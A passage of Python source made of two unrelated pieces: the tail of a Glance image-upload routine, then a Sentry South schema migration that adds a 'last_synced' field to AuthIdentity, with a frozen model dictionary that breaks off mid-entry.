# predetermined.
start_transfer(context,
read_handle,
0,
image_id=image_id,
image_meta=image_metadata)
LOG.debug("Uploaded image %s to the Glance image server", image_id,
instance=instance)
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AuthIdentity.last_synced'
db.add_column('sentry_authidentity', 'last_synced',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
def backwards(self, orm):
# Deleting field 'AuthIdentity.last_synced'
db.delete_column('sentry_authidentity', 'last_synced')
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'audit_actors'", 'to': "orm['sentry.User']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.file': {
'Meta': {'unique_together': "(('name', 'checksum'),)", 'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
